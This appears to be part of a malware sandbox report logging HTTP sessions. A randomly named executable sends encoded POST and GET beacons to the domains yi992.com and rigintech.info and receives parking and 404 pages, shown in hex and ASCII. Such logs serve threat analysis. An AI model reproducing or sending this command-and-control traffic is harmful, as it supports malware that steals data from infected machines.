                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JdtAsr3waICb/+KzqtXRnUyhaAXfOwJfDtq2EI4D7jCLjy2JKV8Ho3IZDc6pbK8otNN9KrQv3nWJZ9wAJ3/JdA==
                                                    set-cookie: parking_session=7f33cd8c-2b95-41dd-aa6e-54739a3138f8; expires=Thu, 05 Sep 2024 12:40:30 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4a 64 74 41 73 72 33 77 61 49 43 62 2f 2b 4b 7a 71 74 58 52 6e 55 79 68 61 41 58 66 4f 77 4a 66 44 74 71 32 45 49 34 44 37 6a 43 4c 6a 79 32 4a 4b 56 38 48 6f 33 49 5a 44 63 36 70 62 4b 38 6f 74 4e 4e 39 4b 72 51 76 33 6e 57 4a 5a 39 77 41 4a 33 2f 4a 64 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JdtAsr3waICb/+KzqtXRnUyhaAXfOwJfDtq2EI4D7jCLjy2JKV8Ho3IZDc6pbK8otNN9KrQv3nWJZ9wAJ3/JdA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 5, 2024 14:25:31.040862083 CEST555INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiN2YzM2NkOGMtMmI5NS00MWRkLWFhNmUtNTQ3MzlhMzEzOGY4IiwicGFnZV90aW1lIjoxNzI1NTM5MT


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.557202199.59.243.226802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:25:33.087347031 CEST1730OUTPOST /iuti/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.yi992.com
                                                    Connection: close
                                                    Content-Length: 1240
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.yi992.com
                                                    Referer: http://www.yi992.com/iuti/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 73 71 76 37 6e 6c 39 4c 54 49 62 5a 61 4e 58 34 66 51 49 79 56 6e 42 7a 36 6b 4d 46 52 30 61 4d 5a 65 4a 6c 39 61 52 41 68 53 39 4b 79 50 36 44 51 6c 38 33 66 66 75 56 7a 70 65 4c 33 47 36 71 48 54 37 51 45 4a 41 71 6b 79 78 59 58 71 44 50 2b 56 6c 5a 6e 76 4c 2b 66 48 5a 57 62 4d 65 50 66 6f 62 4c 72 5a 58 4b 76 30 78 44 78 38 2f 33 31 55 69 66 78 6b 6b 78 39 53 75 31 30 32 49 4b 78 75 31 72 4b 7a 58 56 33 45 77 66 74 55 2b 69 6f 34 51 76 65 73 33 71 43 52 6b 50 75 31 50 79 46 73 51 63 4f 66 62 52 7a 6f 35 44 43 35 32 4f 72 49 72 58 34 4c 70 69 56 59 39 2f 46 42 4a 47 4c 46 2b 49 56 42 54 55 6d 38 77 31 73 38 75 53 72 56 45 58 6d 55 6e 45 55 6b 73 63 4f 65 68 61 53 31 76 68 51 53 6e 4d 6d 50 72 35 6b 38 47 66 4d 70 54 49 59 77 6f 4f 64 4a 65 77 44 62 53 5a 38 52 78 48 49 30 4b 58 6c 79 69 43 6d 32 66 49 61 73 61 50 6d 62 62 56 2f 56 2b 58 43 56 39 33 42 4b 35 77 2f 59 59 67 4d 6d 75 4b 35 33 74 67 66 2f 46 62 41 6f 61 43 57 55 42 65 59 65 49 6e 4f 53 4f 76 33 70 74 58 2b 2f 43 54 4b 42 [TRUNCATED]
                                                    Data Ascii: V6h=sqv7nl9LTIbZaNX4fQIyVnBz6kMFR0aMZeJl9aRAhS9KyP6DQl83ffuVzpeL3G6qHT7QEJAqkyxYXqDP+VlZnvL+fHZWbMePfobLrZXKv0xDx8/31Uifxkkx9Su102IKxu1rKzXV3EwftU+io4Qves3qCRkPu1PyFsQcOfbRzo5DC52OrIrX4LpiVY9/FBJGLF+IVBTUm8w1s8uSrVEXmUnEUkscOehaS1vhQSnMmPr5k8GfMpTIYwoOdJewDbSZ8RxHI0KXlyiCm2fIasaPmbbV/V+XCV93BK5w/YYgMmuK53tgf/FbAoaCWUBeYeInOSOv3ptX+/CTKB6M+1gMNpkQG2mZgz8svBagx7tBdqoPn8oamyJLmjCGKBmDfUtCePv9vGQkSDxbUFq+FnZD+8GKJM/suO52AvyKKg5l1mBfc9FwwaBenSToAG6P5uwn2P0o3aymQx1r2pwo08XPJV3DDKsTY5plDjTb8I7+jFOW/jwaKocbLcpVyKx3qFd6e98kxvKCff2Qza3jwy3Obgh7uC4cvQfudngyYSjF4XMppxylHq/M74H9WF4uWqElenRtud1qtf2el7duIP5Vc/6elbJeRPwd/sEwox/8bOqKwe6lo5F+1lYrk3m49UyBD4E3QgkDbcu5M3B2gTvAhZd9HkePfdkJ0FqRVssxWxCYH3Gx5JEsEMDfbknf0c8idAAMjS1PL7dQV9e9FeqfAcygB9Oy0n0ZEuAw6SMwVSDOB+bVLrwaqpfHRc4YnJNHyOFhdCF+5nX1o/5C/FRO7n6xRnuR+s9Uz02LIpQD3Tr33G5sRRWLIR+ypt9fUIou0GR5lmmXgRyHaFo9C8VdJZsh9KZYeunC6SkuvgrS5B9Qt70O/Ozjr4NRYCwiykKdUy/JiLdedI6+ZZG7d1Pb9SHZD0jxdnvoFGJoGUDnpVB90KvOIW4Enr9UPlHcY3075wmjxkPqcgK22ASwdIwOxBvhy1z0sCRk3Zf8PtNrlTQ3a1Tz [TRUNCATED]
                                                    Sep 5, 2024 14:25:33.547557116 CEST1236INHTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:25:32 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1102
                                                    x-request-id: cffc873e-ec61-44b9-801c-7b2c164572da
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JdtAsr3waICb/+KzqtXRnUyhaAXfOwJfDtq2EI4D7jCLjy2JKV8Ho3IZDc6pbK8otNN9KrQv3nWJZ9wAJ3/JdA==
                                                    set-cookie: parking_session=cffc873e-ec61-44b9-801c-7b2c164572da; expires=Thu, 05 Sep 2024 12:40:33 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4a 64 74 41 73 72 33 77 61 49 43 62 2f 2b 4b 7a 71 74 58 52 6e 55 79 68 61 41 58 66 4f 77 4a 66 44 74 71 32 45 49 34 44 37 6a 43 4c 6a 79 32 4a 4b 56 38 48 6f 33 49 5a 44 63 36 70 62 4b 38 6f 74 4e 4e 39 4b 72 51 76 33 6e 57 4a 5a 39 77 41 4a 33 2f 4a 64 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JdtAsr3waICb/+KzqtXRnUyhaAXfOwJfDtq2EI4D7jCLjy2JKV8Ho3IZDc6pbK8otNN9KrQv3nWJZ9wAJ3/JdA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 5, 2024 14:25:33.547616959 CEST555INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiY2ZmYzg3M2UtZWM2MS00NGI5LTgwMWMtN2IyYzE2NDU3MmRhIiwicGFnZV90aW1lIjoxNzI1NTM5MT


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.557203199.59.243.226802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:25:35.622976065 CEST444OUTGET /iuti/?V6h=hoHbkVcpbob4KKGwTSg4Qmxuxm4KO3ujR6NVpJZRiS90gufBWzA0W/yR6JGFw3H3NTWRULQgnx1gCbPTi357oLTiVxRhMsTUHJ+Wl6jWlVJ6tv3Z5Sqw5Cg13CqV209vow==&sH=nVVHdDTx2PSTVJ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.yi992.com
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Sep 5, 2024 14:25:36.174249887 CEST1236INHTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:25:35 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1482
                                                    x-request-id: 2a5ae1b9-0f78-435c-9c7c-c2f912c89954
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tZq9GE0sSpNiVN5+4DgzsVny9iEIv4u4RWJJWZwFIQcSqVhmHkmg1pWvll9Z/mNhN0xHkQUvaY2ftgGPsqZ9oA==
                                                    set-cookie: parking_session=2a5ae1b9-0f78-435c-9c7c-c2f912c89954; expires=Thu, 05 Sep 2024 12:40:36 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 74 5a 71 39 47 45 30 73 53 70 4e 69 56 4e 35 2b 34 44 67 7a 73 56 6e 79 39 69 45 49 76 34 75 34 52 57 4a 4a 57 5a 77 46 49 51 63 53 71 56 68 6d 48 6b 6d 67 31 70 57 76 6c 6c 39 5a 2f 6d 4e 68 4e 30 78 48 6b 51 55 76 61 59 32 66 74 67 47 50 73 71 5a 39 6f 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tZq9GE0sSpNiVN5+4DgzsVny9iEIv4u4RWJJWZwFIQcSqVhmHkmg1pWvll9Z/mNhN0xHkQUvaY2ftgGPsqZ9oA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 5, 2024 14:25:36.174282074 CEST935INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmE1YWUxYjktMGY3OC00MzVjLTljN2MtYzJmOTEyYzg5OTU0IiwicGFnZV90aW1lIjoxNzI1NTM5MT


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    13192.168.2.557204162.0.213.94802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:25:50.058168888 CEST708OUTPOST /ig9u/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.rigintech.info
                                                    Connection: close
                                                    Content-Length: 204
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.rigintech.info
                                                    Referer: http://www.rigintech.info/ig9u/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 4f 75 7a 35 45 31 59 56 63 44 4b 73 61 2b 58 49 57 66 66 75 4d 30 63 36 46 71 4d 71 2f 59 62 7a 34 4a 72 51 79 48 41 6e 77 67 5a 49 4a 45 44 52 6a 6b 31 72 37 47 76 44 35 45 43 6c 50 76 79 70 4a 6a 35 49 68 6b 4b 64 2f 74 33 73 65 59 38 4d 59 4c 32 2f 55 41 6a 6b 42 34 54 68 77 64 49 33 43 46 6c 59 4d 4f 5a 69 7a 33 42 70 78 4c 6b 51 4c 77 37 6b 47 69 79 45 48 47 69 65 65 6f 6f 2b 47 78 33 68 70 4e 55 31 5a 74 54 30 52 61 4a 45 34 34 4d 5a 4d 42 53 34 54 6e 36 4c 6b 68 42 50 4b 78 33 4d 43 38 69 33 58 76 32 57 6d 76 67 59 41 4b 68 57 50 37 47 42 55 54 6f 51 4a 6b 32 75 73 79 4f 46 55 61 4d 3d
                                                    Data Ascii: V6h=Ouz5E1YVcDKsa+XIWffuM0c6FqMq/Ybz4JrQyHAnwgZIJEDRjk1r7GvD5EClPvypJj5IhkKd/t3seY8MYL2/UAjkB4ThwdI3CFlYMOZiz3BpxLkQLw7kGiyEHGieeoo+Gx3hpNU1ZtT0RaJE44MZMBS4Tn6LkhBPKx3MC8i3Xv2WmvgYAKhWP7GBUToQJk2usyOFUaM=
                                                    Sep 5, 2024 14:25:50.658869028 CEST1236INHTTP/1.1 404 Not Found
                                                    Date: Thu, 05 Sep 2024 12:25:50 GMT
                                                    Server: Apache
                                                    Content-Length: 16052
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                    Sep 5, 2024 14:25:50.658911943 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                    Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                    Sep 5, 2024 14:25:50.658925056 CEST1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                    Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                    Sep 5, 2024 14:25:50.658937931 CEST1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                    Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                    Sep 5, 2024 14:25:50.658951044 CEST896INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                    Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                    Sep 5, 2024 14:25:50.659126997 CEST1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                    Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                    Sep 5, 2024 14:25:50.659152985 CEST1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                    Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                    Sep 5, 2024 14:25:50.659163952 CEST448INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                    Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                    Sep 5, 2024 14:25:50.659312963 CEST1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                    Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                    Sep 5, 2024 14:25:50.659326077 CEST1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                    Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                                                    Sep 5, 2024 14:25:50.664133072 CEST1236INData Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                                                    Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    14192.168.2.557205162.0.213.94802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
